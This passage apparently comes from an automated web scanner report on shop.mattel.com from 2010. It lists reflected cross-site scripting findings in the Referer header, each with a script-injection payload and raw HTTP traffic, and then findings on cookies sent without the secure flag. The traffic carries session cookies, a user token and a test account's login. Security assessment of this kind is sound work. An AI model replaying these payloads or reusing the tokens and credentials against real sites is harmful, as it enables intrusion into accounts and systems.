Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=83600"><script>alert(1)</script>03a94f135fd

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:13 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39375


                                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=topna661;cat=games197;u6=;u4=3719992;u5=http://www.google.com/search?hl=en&q=83600"><script>alert(1)</script>03a94f135fd;u2=5;u3=;u1=;ord=1;num=88359962?" width="1" height="1" frameborder="0">
...[SNIP]...

1.76. http://shop.mattel.com/history/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /history/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65eb3"><script>alert(1)</script>fe48f0b8dca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /history/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=65eb3"><script>alert(1)</script>fe48f0b8dca

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:34 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45088


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=65eb3"><script>alert(1)</script>fe48f0b8dca;u2=1;u3=;u1=;ord=1;num=33774843?" width="1" height="1" frameborder="0">
...[SNIP]...

1.77. http://shop.mattel.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 129a5"><script>alert(1)</script>d516d332891 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=129a5"><script>alert(1)</script>d516d332891

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:51 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45370


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=129a5"><script>alert(1)</script>d516d332891;u2=1;u3=;u1=;ord=1;num=32562816?" width="1" height="1" frameborder="0">
...[SNIP]...

1.78. http://shop.mattel.com/product/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b892"><script>alert(1)</script>2213eb59c24 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /product/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=4b892"><script>alert(1)</script>2213eb59c24

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:48 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45312


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=4b892"><script>alert(1)</script>2213eb59c24;u2=1;u3=;u1=;ord=1;num=60684825?" width="1" height="1" frameborder="0">
...[SNIP]...

1.79. http://shop.mattel.com/search/controller.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /search/controller.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24c6f"><script>alert(1)</script>27e45151b39 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /search/controller.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=24c6f"><script>alert(1)</script>27e45151b39

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:35 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45183


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=24c6f"><script>alert(1)</script>27e45151b39;u2=1;u3=;u1=3747401524;ord=1;num=17518156?" width="1" height="1" frameborder="0">
...[SNIP]...

1.80. http://shop.mattel.com/shop/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7fd"><script>alert(1)</script>a8c907b55ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/index.jsp?categoryId=3719992 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=fb7fd"><script>alert(1)</script>a8c907b55ff

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:38 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39040


                                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=topna661;cat=games197;u6=;u4=3719992;u5=http://www.google.com/search?hl=en&q=fb7fd"><script>alert(1)</script>a8c907b55ff;u2=5;u3=;u1=;ord=1;num=82099516?" width="1" height="1" frameborder="0">
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 11 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://shop.mattel.com/affiliate/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliate/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:16 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=bGkwNSJQK1gxnpPZcfpDGyz9DBWqmgjmKFr3FtyLQYQJNGQ2yfF2!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38474


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...

2.2. https://shop.mattel.com/brand/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brand/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=vXThNSJGvphcGlG0d0LJVTlQkpRwpfvpyMkBCbTY3tRF30zxYTN0!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36834


                                                                                            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...

2.3. https://shop.mattel.com/cart/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /cart/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/cart/index.jsp
Set-Cookie: JSESSIONID=TG2TNSJLw8tNpQytl4Ltw1WL82GGTGkRD2vPLnj1GMtCSh4GnV1t!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/cart/index.
...[SNIP]...

2.4. https://shop.mattel.com/coreg/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /coreg/index.jsp HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: https://shop.mattel.com/checkout/index.jsp?process=login
Cache-Control: max-age=0
Origin: https://shop.mattel.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A4%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084615922}
Content-Length: 61

step=login&email=test%40fastdial.net&password=SkipIt1&x=0&y=0

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:11:07 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=myaccount
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; expires=Sunday, 20-Dec-2020 00:11:07 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 315

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/checkout/i
...[SNIP]...

2.5. https://shop.mattel.com/coreg/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coreg/index.jsp?step=logout HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
